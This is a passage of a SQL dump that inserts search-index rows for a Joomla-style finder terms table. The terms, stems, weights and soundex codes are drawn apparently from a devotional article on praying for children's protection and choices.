(215057, 'as they all', 'as they all', 0, 1, 1.3667, 'A234', 1, '*'),
(215058, 'as your', 'as your', 0, 1, 1.2333, 'A260', 2, '*'),
(215059, 'assignment but', 'assign but', 0, 1, 1.4667, 'A25313', 1, '*'),
(215060, 'assignment but you', 'assign but you', 0, 1, 1.6, 'A25313', 1, '*'),
(215061, 'aunt', 'aunt', 0, 0, 0.2667, 'A530', 1, '*'),
(215062, 'aunt is', 'aunt is', 0, 1, 1.2333, 'A532', 1, '*'),
(215063, 'aunt is the', 'aunt is the', 0, 1, 1.3667, 'A5323', 1, '*'),
(215064, 'ayodele areogun', 'ayodel areogun', 0, 1, 1.5, 'A34625', 25, '*'),
(215065, 'bad relationship', 'bad relationship', 0, 1, 1.5333, 'B3643521', 1, '*'),
(215066, 'bad relationship it', 'bad relationship it', 0, 1, 1.6333, 'B36435213', 1, '*'),
(215067, 'bad relationship out', 'bad relationship out', 0, 1, 1.6667, 'B36435213', 1, '*'),
(215068, 'be in charge', 'be in charge', 0, 1, 1.4, 'B5262', 1, '*'),
(215069, 'be there', 'be there', 0, 1, 1.2667, 'B360', 1, '*'),
(215070, 'be there with', 'be there with', 0, 1, 1.4333, 'B363', 1, '*'),
(215071, 'be treated', 'be treated', 0, 1, 1.3333, 'B363', 1, '*'),
(215072, 'be treated the', 'be treated the', 0, 1, 1.4667, 'B363', 1, '*'),
(215073, 'be very', 'be very', 0, 1, 1.2333, 'B600', 1, '*'),
(215074, 'be very important', 'be very important', 0, 1, 1.5667, 'B6516353', 1, '*'),
(215075, 'because everyone', 'becaus everyone', 0, 1, 1.5333, 'B2165', 1, '*'),
(215076, 'because everyone needs', 'becaus everyone needs', 0, 1, 1.7333, 'B216532', 1, '*'),
(215077, 'because there will', 'becaus there will', 0, 1, 1.6, 'B2364', 1, '*'),
(215078, 'because you can\'t', 'becaus you can', 0, 1, 1.5667, 'B253', 1, '*'),
(215079, 'become victorious', 'becom victorious', 0, 1, 1.5667, 'B2512362', 1, '*'),
(215080, 'become victorious in', 'becom victorious in', 0, 1, 1.6667, 'B25123625', 1, '*'),
(215081, 'better you', 'better you', 0, 1, 1.3333, 'B360', 1, '*'),
(215082, 'better you will', 'better you will', 0, 1, 1.5, 'B364', 1, '*'),
(215083, 'between right', 'between right', 0, 1, 1.4333, 'B35623', 1, '*'),
(215084, 'between right and', 'between right and', 0, 1, 1.5667, 'B3562353', 1, '*'),
(215085, 'bit', 'bit', 0, 0, 0.2, 'B300', 1, '*'),
(215086, 'bit late', 'bit late', 0, 1, 1.2667, 'B343', 1, '*'),
(215087, 'bit late in', 'bit late in', 0, 1, 1.3667, 'B3435', 1, '*'),
(215088, 'black and', 'black and', 0, 1, 1.3, 'B4253', 1, '*'),
(215089, 'black and white', 'black and white', 0, 1, 1.5, 'B4253', 1, '*'),
(215090, 'books god\'s', 'book god', 0, 1, 1.3667, 'B232', 1, '*'),
(215091, 'books god\'s plan', 'book god plan', 0, 1, 1.5333, 'B232145', 1, '*'),
(215092, 'brilliance', 'brillianc', 0, 0, 0.6667, 'B6452', 1, '*'),
(215093, 'brilliance strength', 'brillianc strength', 0, 1, 1.6333, 'B645236523', 1, '*'),
(215094, 'brilliance strength or', 'brillianc strength or', 0, 1, 1.7333, 'B6452365236', 1, '*'),
(215095, 'bring them', 'bring them', 0, 1, 1.3333, 'B65235', 1, '*'),
(215096, 'bring them down', 'bring them down', 0, 1, 1.5, 'B6523535', 1, '*'),
(215097, 'but the ability', 'but the ability', 0, 1, 1.5, 'B3143', 1, '*'),
(215098, 'but who is', 'but who is', 0, 1, 1.3333, 'B320', 1, '*'),
(215099, 'but you can', 'but you can', 0, 1, 1.3667, 'B325', 1, '*'),
(215100, 'but you don\'t', 'but you don', 0, 1, 1.4333, 'B353', 1, '*'),
(215101, 'but you should', 'but you should', 0, 1, 1.4667, 'B3243', 1, '*'),
(215102, 'by refusing', 'by refusing', 0, 1, 1.3667, 'B61252', 1, '*'),
(215103, 'by refusing those', 'by refusing those', 0, 1, 1.5667, 'B6125232', 1, '*'),
(215104, 'by their', 'by their', 0, 1, 1.2667, 'B360', 1, '*'),
(215105, 'by their relationship', 'by their relationship', 0, 1, 1.7, 'B3643521', 1, '*'),
(215106, 'can and', 'can and', 0, 1, 1.2333, 'C530', 1, '*'),
(215107, 'can and will', 'can and will', 0, 1, 1.4, 'C534', 1, '*'),
(215108, 'can bring', 'can bring', 0, 1, 1.3, 'C51652', 2, '*'),
(215109, 'can bring them', 'can bring them', 0, 1, 1.4667, 'C5165235', 1, '*'),
(215110, 'can give your', 'can give your', 0, 1, 1.4333, 'C5216', 1, '*'),
(215111, 'can go', 'can go', 0, 1, 1.2, 'C520', 1, '*'),
(215112, 'can go in', 'can go in', 0, 1, 1.3, 'C525', 1, '*'),
(215113, 'can have good', 'can have good', 0, 1, 1.4333, 'C5123', 1, '*'),
(215114, 'can leave', 'can leave', 0, 1, 1.3, 'C541', 1, '*'),
(215115, 'can leave for', 'can leave for', 0, 1, 1.4333, 'C5416', 1, '*'),
(215116, 'can scatter', 'can scatter', 0, 1, 1.3667, 'C5236', 1, '*'),
(215117, 'can scatter all', 'can scatter all', 0, 1, 1.5, 'C52364', 1, '*'),
(215118, 'can shield', 'can shield', 0, 1, 1.3333, 'C5243', 1, '*'),
(215119, 'can shield your', 'can shield your', 0, 1, 1.5, 'C52436', 1, '*'),
(215120, 'can\'t replace', 'can replace', 0, 1, 1.4333, 'C536142', 1, '*'),
(215121, 'can\'t replace family', 'can replace family', 0, 1, 1.6667, 'C536142154', 1, '*'),
(215122, 'can\'t stop', 'can stop', 0, 1, 1.3333, 'C53231', 1, '*'),
(215123, 'can\'t stop your', 'can stop your', 0, 1, 1.5, 'C532316', 1, '*'),
(215124, 'cannot get', 'cannot get', 0, 1, 1.3333, 'C5323', 1, '*'),
(215125, 'cannot get to', 'cannot get to', 0, 1, 1.4333, 'C5323', 1, '*'),
(215126, 'care and', 'care and', 0, 1, 1.2667, 'C653', 1, '*'),
(215127, 'care and consideration', 'care and consideration', 0, 1, 1.7333, 'C6532523635', 1, '*'),
(215128, 'career and', 'career and', 0, 1, 1.3333, 'C653', 1, '*'),
(215129, 'career and marriage', 'career and marriage', 0, 1, 1.6333, 'C653562', 1, '*'),
(215130, 'charge', 'charg', 0, 0, 0.4, 'C620', 1, '*'),
(215131, 'charge of', 'charg of', 0, 1, 1.3, 'C621', 1, '*'),
(215132, 'charge of how', 'charg of how', 0, 1, 1.4333, 'C621', 1, '*'),
(215133, 'child and', 'child and', 0, 1, 1.3, 'C4353', 1, '*'),
(215134, 'child and all', 'child and all', 0, 1, 1.4333, 'C43534', 1, '*'),
(215135, 'child but', 'child but', 0, 1, 1.3, 'C4313', 1, '*'),
(215136, 'child but you', 'child but you', 0, 1, 1.4333, 'C4313', 1, '*'),
(215137, 'child is', 'child is', 0, 1, 1.2667, 'C432', 1, '*'),
(215138, 'child is to', 'child is to', 0, 1, 1.3667, 'C4323', 1, '*'),
(215139, 'child was', 'child was', 0, 1, 1.3, 'C432', 1, '*'),
(215140, 'child was a', 'child was a', 0, 1, 1.3667, 'C432', 1, '*'),
(215141, 'child with', 'child with', 0, 1, 1.3333, 'C430', 1, '*'),
(215142, 'child with prayers', 'child with prayers', 0, 1, 1.6, 'C43162', 1, '*'),
(215143, 'children and all', 'children and all', 0, 1, 1.5333, 'C436534', 1, '*'),
(215144, 'children and ensuring', 'children and ensuring', 0, 1, 1.7, 'C4365352652', 1, '*'),
(215145, 'children as they', 'children as they', 0, 1, 1.5333, 'C436523', 1, '*'),
(215146, 'children as your', 'children as your', 0, 1, 1.5333, 'C436526', 1, '*'),
(215147, 'children because', 'children because', 0, 1, 1.5333, 'C436512', 1, '*'),
(215148, 'children because you', 'children because you', 0, 1, 1.6667, 'C436512', 1, '*'),
(215149, 'children delay', 'children delay', 0, 1, 1.4667, 'C436534', 1, '*'),
(215150, 'children delay therefore', 'children delay therefore', 0, 1, 1.8, 'C4365343616', 1, '*'),
(215151, 'children from', 'children from', 0, 1, 1.4333, 'C4365165', 1, '*'),
(215152, 'children from contacting', 'children from contacting', 0, 1, 1.8, 'C43651652532352', 1, '*'),
(215153, 'children go', 'children go', 0, 1, 1.3667, 'C43652', 1, '*'),
(215154, 'children go through', 'children go through', 0, 1, 1.6333, 'C43652362', 1, '*'),
(215155, 'children how', 'children how', 0, 1, 1.4, 'C4365', 1, '*'),
(215156, 'children how far', 'children how far', 0, 1, 1.5333, 'C436516', 1, '*'),
(215157, 'children if', 'children if', 0, 1, 1.3667, 'C43651', 1, '*'),
(215158, 'children if they', 'children if they', 0, 1, 1.5333, 'C436513', 1, '*'),
(215159, 'children is', 'children is', 0, 1, 1.3667, 'C43652', 2, '*'),
(215160, 'children is not', 'children is not', 0, 1, 1.5, 'C4365253', 1, '*'),
(215161, 'children may', 'children may', 0, 1, 1.4, 'C4365', 1, '*'),
(215162, 'children may want', 'children may want', 0, 1, 1.5667, 'C43653', 1, '*'),
(215163, 'children of eli', 'children of eli', 0, 1, 1.5, 'C436514', 1, '*'),
(215164, 'children to have', 'children to have', 0, 1, 1.5333, 'C436531', 1, '*'),
(215165, 'children to make', 'children to make', 0, 1, 1.5333, 'C4365352', 1, '*'),
(215166, 'children today', 'children today', 0, 1, 1.4667, 'C43653', 1, '*'),
(215167, 'children today plead', 'children today plead', 0, 1, 1.6667, 'C43653143', 1, '*'),
(215168, 'children with', 'children with', 0, 1, 1.4333, 'C43653', 1, '*'),
(215169, 'children with extra', 'children with extra', 0, 1, 1.6333, 'C43653236', 1, '*'),
(215170, 'children you', 'children you', 0, 1, 1.4, 'C4365', 1, '*'),
(215171, 'children you must', 'children you must', 0, 1, 1.5667, 'C436523', 1, '*'),
(215172, 'choice', 'choic', 0, 0, 0.4, 'C000', 1, '*'),
(215173, 'choice and', 'choic and', 0, 1, 1.3333, 'C530', 1, '*'),
(215174, 'choice and he', 'choic and he', 0, 1, 1.4333, 'C530', 1, '*'),
(215175, 'choices', 'choic', 0, 0, 0.4667, 'C000', 1, '*'),
(215176, 'choices about', 'choic about', 0, 1, 1.4333, 'C130', 1, '*'),
(215177, 'choices about location', 'choic about location', 0, 1, 1.7333, 'C134235', 1, '*'),
(215178, 'choices in', 'choic in', 0, 1, 1.3333, 'C500', 1, '*'),
(215179, 'choices in life', 'choic in life', 0, 1, 1.5, 'C541', 1, '*'),
(215180, 'choices they', 'choic they', 0, 1, 1.4, 'C300', 1, '*'),
(215181, 'choices they will', 'choic they will', 0, 1, 1.5667, 'C340', 1, '*'),
(215182, 'choose right', 'choos right', 0, 1, 1.4, 'C623', 1, '*'),
(215183, 'choose right samson', 'choos right samson', 0, 1, 1.6333, 'C6232525', 1, '*'),
(215184, 'chose', 'chose', 0, 0, 0.3333, 'C000', 1, '*'),
(215185, 'chose what', 'chose what', 0, 1, 1.3333, 'C300', 1, '*'),
(215186, 'chose what seemed', 'chose what seemed', 0, 1, 1.5667, 'C3253', 1, '*'),
(215187, 'christ that is', 'christ that is', 0, 1, 1.4667, 'C6232', 1, '*'),
(215188, 'clearly written', 'clearli written', 0, 1, 1.5, 'C464635', 1, '*'),
(215189, 'clearly written in', 'clearli written in', 0, 1, 1.6, 'C464635', 1, '*'),
(215190, 'comes for them', 'come for them', 0, 1, 1.4667, 'C521635', 1, '*'),
(215191, 'commit', 'commit', 0, 0, 0.4, 'C530', 3, '*'),
(215192, 'commit them', 'commit them', 0, 1, 1.3667, 'C535', 1, '*'),
(215193, 'commit them to', 'commit them to', 0, 1, 1.4667, 'C5353', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(215194, 'conception delivery', 'concept delivery', 0, 1, 1.6333, 'C521353416', 1, '*'),
(215195, 'conception delivery god\'s', 'concept delivery god', 0, 1, 1.8333, 'C521353416232', 1, '*'),
(215196, 'confronted', 'confront', 0, 0, 0.6667, 'C51653', 1, '*'),
(215197, 'confronted with', 'confront with', 0, 1, 1.5, 'C51653', 1, '*'),
(215198, 'confronted with are', 'confront with are', 0, 1, 1.6333, 'C516536', 1, '*'),
(215199, 'consideration', 'consider', 0, 0, 0.8667, 'C523635', 1, '*'),
(215200, 'consideration if', 'consider if', 0, 1, 1.5333, 'C5236351', 1, '*'),
(215201, 'consideration if you', 'consider if you', 0, 1, 1.6667, 'C5236351', 1, '*'),
(215202, 'contacting', 'contact', 0, 0, 0.6667, 'C532352', 1, '*'),
(215203, 'contacting the', 'contact the', 0, 1, 1.4667, 'C5323523', 1, '*'),
(215204, 'contacting the flows', 'contact the flows', 0, 1, 1.6667, 'C5323523142', 1, '*'),
(215205, 'corrupt', 'corrupt', 0, 0, 0.4667, 'C613', 1, '*'),
(215206, 'corrupt their', 'corrupt their', 0, 1, 1.4333, 'C6136', 1, '*'),
(215207, 'corrupt their future', 'corrupt their future', 0, 1, 1.6667, 'C6136136', 1, '*'),
(215208, 'cousins', 'cousin', 0, 0, 0.4667, 'C520', 1, '*'),
(215209, 'cousins and', 'cousin and', 0, 1, 1.3667, 'C5253', 1, '*'),
(215210, 'cousins and if', 'cousin and if', 0, 1, 1.4667, 'C52531', 1, '*'),
(215211, 'creep', 'creep', 0, 0, 0.3333, 'C610', 1, '*'),
(215212, 'creep into', 'creep into', 0, 1, 1.3333, 'C6153', 1, '*'),
(215213, 'creep into the', 'creep into the', 0, 1, 1.4667, 'C6153', 1, '*'),
(215214, 'declare that the', 'declar that the', 0, 1, 1.5333, 'D2463', 1, '*'),
(215215, 'delay therefore', 'delai therefore', 0, 1, 1.5, 'D43616', 1, '*'),
(215216, 'delay therefore pray', 'delai therefore pray', 0, 1, 1.6667, 'D4361616', 1, '*'),
(215217, 'delivery god\'s', 'deliveri god', 0, 1, 1.4667, 'D416232', 1, '*'),
(215218, 'delivery god\'s plan', 'deliveri god plan', 0, 1, 1.6333, 'D416232145', 1, '*'),
(215219, 'destroy your child', 'destroi your child', 0, 1, 1.6, 'D236243', 1, '*'),
(215220, 'determine their', 'determin their', 0, 1, 1.5, 'D6536', 1, '*'),
(215221, 'determine their experiences', 'determin their experiences', 0, 1, 1.9, 'D653621652', 1, '*'),
(215222, 'determine your', 'determin your', 0, 1, 1.4667, 'D656', 1, '*'),
(215223, 'determine your results', 'determin your results', 0, 1, 1.7333, 'D6562432', 1, '*'),
(215224, 'determined by their', 'determin by their', 0, 1, 1.6333, 'D653136', 1, '*'),
(215225, 'determines the values', 'determin the values', 0, 1, 1.7, 'D6523142', 1, '*'),
(215226, 'devil has placed', 'devil has placed', 0, 1, 1.5333, 'D1421423', 1, '*'),
(215227, 'devil will', 'devil will', 0, 1, 1.3333, 'D140', 3, '*'),
(215228, 'devil will be', 'devil will be', 0, 1, 1.4333, 'D141', 1, '*'),
(215229, 'died with', 'di with', 0, 1, 1.3, 'D000', 1, '*'),
(215230, 'died with the', 'di with the', 0, 1, 1.4333, 'D000', 1, '*'),
(215231, 'discern', 'discern', 0, 0, 0.4667, 'D265', 1, '*'),
(215232, 'discern what', 'discern what', 0, 1, 1.4, 'D2653', 1, '*'),
(215233, 'discern what is', 'discern what is', 0, 1, 1.5, 'D26532', 1, '*'),
(215234, 'discernment', 'discern', 0, 0, 0.7333, 'D2653', 1, '*'),
(215235, 'discernment discernment', 'discern discernment', 0, 1, 1.7667, 'D26532653', 1, '*'),
(215236, 'discernment discernment is', 'discern discernment is', 0, 1, 1.8667, 'D265326532', 1, '*'),
(215237, 'discernment is', 'discern is', 0, 1, 1.4667, 'D26532', 1, '*'),
(215238, 'discernment is the', 'discern is the', 0, 1, 1.6, 'D265323', 1, '*'),
(215239, 'divine plan', 'divin plan', 0, 1, 1.3667, 'D15145', 1, '*'),
(215240, 'divine plan or', 'divin plan or', 0, 1, 1.4667, 'D151456', 1, '*'),
(215241, 'doing anything', 'do anything', 0, 1, 1.4667, 'D525352', 2, '*'),
(215242, 'doing anything to', 'do anything to', 0, 1, 1.5667, 'D5253523', 1, '*'),
(215243, 'don\'t understand', 'don understand', 0, 1, 1.5333, 'D535362353', 1, '*'),
(215244, 'don\'t understand why', 'don understand why', 0, 1, 1.6667, 'D535362353', 1, '*'),
(215245, 'down and corrupt', 'down and corrupt', 0, 1, 1.5333, 'D532613', 1, '*'),
(215246, 'down the', 'down the', 0, 1, 1.2667, 'D530', 1, '*'),
(215247, 'down the road', 'down the road', 0, 1, 1.4333, 'D5363', 1, '*'),
(215248, 'e sodom', 'e sodom', 0, 1, 1.2333, 'E235', 1, '*'),
(215249, 'e sodom and', 'e sodom and', 0, 1, 1.3667, 'E2353', 1, '*'),
(215250, 'effort will', 'effort will', 0, 1, 1.3667, 'E1634', 1, '*'),
(215251, 'effort will not', 'effort will not', 0, 1, 1.5, 'E163453', 1, '*'),
(215252, 'eli', 'eli', 0, 0, 0.2, 'E400', 3, '*'),
(215253, 'eli in', 'eli in', 0, 1, 1.2, 'E450', 1, '*'),
(215254, 'eli in 1', 'eli in 1', 0, 1, 1.2667, 'E450', 1, '*'),
(215255, 'else the', 'els the', 0, 1, 1.2667, 'E423', 1, '*'),
(215256, 'else the devil', 'els the devil', 0, 1, 1.4667, 'E42314', 1, '*'),
(215257, 'enemy lot', 'enemi lot', 0, 1, 1.3, 'E543', 1, '*'),
(215258, 'enemy lot chose', 'enemi lot chose', 0, 1, 1.5, 'E5432', 1, '*'),
(215259, 'enjoy favour', 'enjoi favour', 0, 1, 1.4, 'E5216', 1, '*'),
(215260, 'enjoy favour with', 'enjoi favour with', 0, 1, 1.5667, 'E52163', 1, '*'),
(215261, 'ensuring', 'ensur', 0, 0, 0.5333, 'E52652', 1, '*'),
(215262, 'ensuring you', 'ensur you', 0, 1, 1.4, 'E52652', 1, '*'),
(215263, 'ensuring you are', 'ensur you are', 0, 1, 1.5333, 'E526526', 1, '*'),
(215264, 'escape all', 'escap all', 0, 1, 1.3333, 'E214', 1, '*'),
(215265, 'escape all wrong', 'escap all wrong', 0, 1, 1.5333, 'E214652', 1, '*'),
(215266, 'even better', 'even better', 0, 1, 1.3667, 'E15136', 1, '*'),
(215267, 'even better you', 'even better you', 0, 1, 1.5, 'E15136', 1, '*'),
(215268, 'even more', 'even more', 0, 1, 1.3, 'E156', 2, '*'),
(215269, 'even more pray', 'even more pray', 0, 1, 1.4667, 'E15616', 1, '*'),
(215270, 'experiences and', 'experi and', 0, 1, 1.5, 'E2165253', 1, '*'),
(215271, 'experiences and not', 'experi and not', 0, 1, 1.6333, 'E216525353', 1, '*'),
(215272, 'experiences declare', 'experi declare', 0, 1, 1.6333, 'E216523246', 1, '*'),
(215273, 'experiences declare that', 'experi declare that', 0, 1, 1.8, 'E2165232463', 1, '*'),
(215274, 'experiences of', 'experi of', 0, 1, 1.4667, 'E216521', 2, '*'),
(215275, 'experiences of your', 'experi of your', 0, 1, 1.6333, 'E2165216', 1, '*'),
(215276, 'extra', 'extra', 0, 0, 0.3333, 'E236', 1, '*'),
(215277, 'extra care', 'extra care', 0, 1, 1.3333, 'E23626', 1, '*'),
(215278, 'extra care and', 'extra care and', 0, 1, 1.4667, 'E2362653', 1, '*'),
(215279, 'eyes i', 'ey i', 0, 1, 1.2, 'E200', 1, '*'),
(215280, 'eyes i e', 'ey i e', 0, 1, 1.2667, 'E200', 1, '*'),
(215281, 'eyes of', 'ey of', 0, 1, 1.2333, 'E210', 1, '*'),
(215282, 'eyes of the', 'ey of the', 0, 1, 1.3667, 'E213', 1, '*'),
(215283, 'family lines', 'famili lines', 0, 1, 1.4, 'F5452', 1, '*'),
(215284, 'family lines that', 'famili lines that', 0, 1, 1.5667, 'F54523', 1, '*'),
(215285, 'family relationships', 'famili relationships', 0, 1, 1.6667, 'F546435212', 1, '*'),
(215286, 'family relationships but', 'famili relationships but', 0, 1, 1.8, 'F54643521213', 1, '*'),
(215287, 'far they', 'far they', 0, 1, 1.2667, 'F630', 1, '*'),
(215288, 'far they can', 'far they can', 0, 1, 1.4, 'F6325', 1, '*'),
(215289, 'favour', 'favour', 0, 0, 0.4, 'F600', 2, '*'),
(215290, 'favour because', 'favour because', 0, 1, 1.4667, 'F612', 1, '*'),
(215291, 'favour because everyone', 'favour because everyone', 0, 1, 1.7667, 'F612165', 1, '*'),
(215292, 'favour where', 'favour where', 0, 1, 1.4, 'F600', 1, '*'),
(215293, 'favour where brilliance', 'favour where brilliance', 0, 1, 1.7667, 'F616452', 1, '*'),
(215294, 'favour will', 'favour will', 0, 1, 1.3667, 'F640', 1, '*'),
(215295, 'favour will surround', 'favour will surround', 0, 1, 1.6667, 'F642653', 1, '*'),
(215296, 'favour with', 'favour with', 0, 1, 1.3667, 'F630', 1, '*'),
(215297, 'favour with people', 'favour with people', 0, 1, 1.6, 'F6314', 1, '*'),
(215298, 'female ancestral', 'femal ancestral', 0, 1, 1.5333, 'F5452364', 1, '*'),
(215299, 'female ancestral flows', 'femal ancestral flows', 0, 1, 1.7333, 'F5452364142', 1, '*'),
(215300, 'flow nb', 'flow nb', 0, 1, 1.2333, 'F451', 1, '*'),
(215301, 'flow nb get', 'flow nb get', 0, 1, 1.3667, 'F45123', 1, '*'),
(215302, 'flow will', 'flow will', 0, 1, 1.3, 'F400', 1, '*'),
(215303, 'flow will creep', 'flow will creep', 0, 1, 1.5, 'F4261', 1, '*'),
(215304, 'flows genesis', 'flow genesis', 0, 1, 1.4333, 'F4252', 1, '*'),
(215305, 'flows genesis 49', 'flow genesis 49', 0, 1, 1.5333, 'F4252', 1, '*'),
(215306, 'flows in', 'flow in', 0, 1, 1.2667, 'F425', 1, '*'),
(215307, 'flows in those', 'flow in those', 0, 1, 1.4667, 'F42532', 1, '*'),
(215308, 'flows in your', 'flow in your', 0, 1, 1.4333, 'F4256', 1, '*'),
(215309, 'flows you', 'flow you', 0, 1, 1.3, 'F420', 1, '*'),
(215310, 'flows you can\'t', 'flow you can', 0, 1, 1.5, 'F4253', 1, '*'),
(215311, 'for a nursing', 'for a nursing', 0, 1, 1.4333, 'F656252', 1, '*'),
(215312, 'for children', 'for children', 0, 1, 1.4, 'F624365', 1, '*'),
(215313, 'for children as', 'for children as', 0, 1, 1.5, 'F6243652', 1, '*'),
(215314, 'for in', 'for in', 0, 1, 1.2, 'F650', 1, '*'),
(215315, 'for in your', 'for in your', 0, 1, 1.3667, 'F656', 1, '*'),
(215316, 'for protection', 'for protection', 0, 1, 1.4667, 'F6163235', 1, '*'),
(215317, 'for protection for', 'for protection for', 0, 1, 1.6, 'F616323516', 1, '*'),
(215318, 'for their', 'for their', 0, 1, 1.3, 'F636', 2, '*'),
(215319, 'for their lives', 'for their lives', 0, 1, 1.5, 'F636412', 1, '*'),
(215320, 'for their success', 'for their success', 0, 1, 1.5667, 'F6362', 1, '*'),
(215321, 'for them protection', 'for them protection', 0, 1, 1.6333, 'F635163235', 1, '*'),
(215322, 'for them that', 'for them that', 0, 1, 1.4333, 'F6353', 1, '*'),
(215323, 'for victorious', 'for victorious', 0, 1, 1.4667, 'F612362', 1, '*'),
(215324, 'for victorious children', 'for victorious children', 0, 1, 1.7667, 'F6123624365', 1, '*'),
(215325, 'for your children', 'for your children', 0, 1, 1.5667, 'F624365', 1, '*'),
(215326, 'for your conception', 'for your conception', 0, 1, 1.6333, 'F6252135', 1, '*'),
(215327, 'form their', 'form their', 0, 1, 1.3333, 'F6536', 1, '*'),
(215328, 'form their philosophy', 'form their philosophy', 0, 1, 1.7, 'F65361421', 1, '*'),
(215329, 'found to', 'found to', 0, 1, 1.2667, 'F530', 1, '*'),
(215330, 'found to be', 'found to be', 0, 1, 1.3667, 'F531', 1, '*'),
(215331, 'from contacting', 'from contacting', 0, 1, 1.5, 'F652532352', 1, '*'),
(215332, 'from contacting the', 'from contacting the', 0, 1, 1.6333, 'F6525323523', 1, '*'),
(215333, 'from when', 'from when', 0, 1, 1.3, 'F650', 1, '*'),
(215334, 'from when they', 'from when they', 0, 1, 1.4667, 'F653', 1, '*'),
(215335, 'future all', 'futur all', 0, 1, 1.3333, 'F364', 1, '*'),
(215336, 'future all it', 'futur all it', 0, 1, 1.4333, 'F3643', 1, '*'),
(215337, 'future his', 'futur his', 0, 1, 1.3333, 'F362', 1, '*'),
(215338, 'future his wife', 'futur his wife', 0, 1, 1.5, 'F3621', 1, '*'),
(215339, 'genesis 13', 'genesi 13', 0, 1, 1.3333, 'G520', 1, '*'),
(215340, 'genesis 13 7-14', 'genesi 13 7-14', 0, 1, 1.5, 'G520', 1, '*'),
(215341, 'genesis 39', 'genesi 39', 0, 1, 1.3333, 'G520', 1, '*'),
(215342, 'genesis 39 21', 'genesi 39 21', 0, 1, 1.4333, 'G520', 1, '*'),
(215343, 'genesis 49', 'genesi 49', 0, 1, 1.3333, 'G520', 1, '*'),
(215344, 'genesis 49 26', 'genesi 49 26', 0, 1, 1.4333, 'G520', 1, '*'),
(215345, 'get the books', 'get the books', 0, 1, 1.4333, 'G312', 1, '*'),
(215346, 'get there', 'get there', 0, 1, 1.3, 'G360', 1, '*'),
(215347, 'get there protection', 'get there protection', 0, 1, 1.6667, 'G36163235', 1, '*'),
(215348, 'get to where', 'get to where', 0, 1, 1.4, 'G360', 2, '*'),
(215349, 'gift you', 'gift you', 0, 1, 1.2667, 'G130', 1, '*'),
(215350, 'gift you can', 'gift you can', 0, 1, 1.4, 'G1325', 1, '*'),
(215351, 'give your children', 'give your children', 0, 1, 1.6, 'G1624365', 1, '*'),
(215352, 'go and greet', 'go and greet', 0, 1, 1.4, 'G53263', 1, '*'),
(215353, 'go through life', 'go through life', 0, 1, 1.5, 'G36241', 1, '*'),
(215354, 'god can and', 'god can and', 0, 1, 1.3667, 'G3253', 1, '*'),
(215355, 'god for their', 'god for their', 0, 1, 1.4333, 'G31636', 1, '*'),
(215356, 'god what determines', 'god what determines', 0, 1, 1.6333, 'G3652', 1, '*'),
(215357, 'gomorrah', 'gomorrah', 0, 0, 0.5333, 'G560', 1, '*'),
(215358, 'gomorrah and', 'gomorrah and', 0, 1, 1.4, 'G5653', 1, '*'),
(215359, 'gomorrah and he', 'gomorrah and he', 0, 1, 1.5, 'G5653', 1, '*'),
(215360, 'good discernment', 'good discernment', 0, 1, 1.5333, 'G32653', 1, '*'),
(215361, 'good discernment discernment', 'good discernment discernment', 0, 1, 1.9333, 'G326532653', 1, '*'),
(215362, 'good judgment', 'good judgment', 0, 1, 1.4333, 'G323253', 1, '*'),
(215363, 'good judgment pray', 'good judgment pray', 0, 1, 1.6, 'G32325316', 1, '*'),
(215364, 'good to', 'good to', 0, 1, 1.2333, 'G300', 1, '*'),
(215365, 'good to his', 'good to his', 0, 1, 1.3667, 'G320', 1, '*'),
(215366, 'great spiritual', 'great spiritual', 0, 1, 1.5, 'G6321634', 1, '*'),
(215367, 'great spiritual life', 'great spiritual life', 0, 1, 1.6667, 'G63216341', 1, '*'),
(215368, 'greatest', 'greatest', 0, 0, 0.5333, 'G6323', 3, '*'),
(215369, 'greatest gift', 'greatest gift', 0, 1, 1.4333, 'G6323213', 1, '*'),
(215370, 'greatest gift you', 'greatest gift you', 0, 1, 1.5667, 'G6323213', 1, '*'),
(215371, 'greatest inheritance', 'greatest inheritance', 0, 1, 1.6667, 'G632356352', 1, '*'),
(215372, 'greatest inheritance you', 'greatest inheritance you', 0, 1, 1.8, 'G632356352', 1, '*'),
(215373, 'greet', 'greet', 0, 0, 0.3333, 'G630', 1, '*'),
(215374, 'greet their', 'greet their', 0, 1, 1.3667, 'G636', 1, '*'),
(215375, 'greet their cousins', 'greet their cousins', 0, 1, 1.6333, 'G636252', 1, '*'),
(215376, 'grow up', 'grow up', 0, 1, 1.2333, 'G610', 2, '*'),
(215377, 'grow up because', 'grow up because', 0, 1, 1.5, 'G612', 1, '*'),
(215378, 'growing up', 'grow up', 0, 1, 1.3333, 'G6521', 1, '*'),
(215379, 'growing up is', 'grow up is', 0, 1, 1.4333, 'G65212', 1, '*'),
(215380, 'had genesis', 'had genesis', 0, 1, 1.3667, 'H3252', 1, '*'),
(215381, 'had genesis 13', 'had genesis 13', 0, 1, 1.4667, 'H3252', 1, '*'),
(215382, 'hands pray', 'hand pray', 0, 1, 1.3333, 'H53216', 1, '*'),
(215383, 'hands pray against', 'hand pray against', 0, 1, 1.6, 'H532162523', 1, '*'),
(215384, 'has ordained for', 'ha ordained for', 0, 1, 1.5333, 'H2635316', 1, '*'),
(215385, 'has placed on', 'ha placed on', 0, 1, 1.4333, 'H214235', 1, '*'),
(215386, 'have a great', 'have a great', 0, 1, 1.4, 'H1263', 1, '*'),
(215387, 'have favour', 'have favour', 0, 1, 1.3667, 'H160', 1, '*'),
(215388, 'have favour where', 'have favour where', 0, 1, 1.5667, 'H160', 1, '*'),
(215389, 'have found', 'have found', 0, 1, 1.3333, 'H153', 1, '*'),
(215390, 'have found to', 'have found to', 0, 1, 1.4333, 'H153', 1, '*'),
(215391, 'have good discernment', 'have good discernment', 0, 1, 1.7, 'H1232653', 1, '*'),
(215392, 'have good judgment', 'have good judgment', 0, 1, 1.6, 'H12323253', 1, '*'),
(215393, 'have laboured', 'have laboured', 0, 1, 1.4333, 'H14163', 1, '*'),
(215394, 'have laboured for', 'have laboured for', 0, 1, 1.5667, 'H1416316', 1, '*'),
(215395, 'have one bad', 'have one bad', 0, 1, 1.4, 'H1513', 1, '*'),
(215396, 'have treated', 'have treated', 0, 1, 1.4, 'H1363', 1, '*'),
(215397, 'have treated them', 'have treated them', 0, 1, 1.5667, 'H13635', 1, '*'),
(215398, 'he had genesis', 'he had genesis', 0, 1, 1.4667, 'H3252', 1, '*'),
(215399, 'he lost', 'he lost', 0, 1, 1.2333, 'H423', 1, '*'),
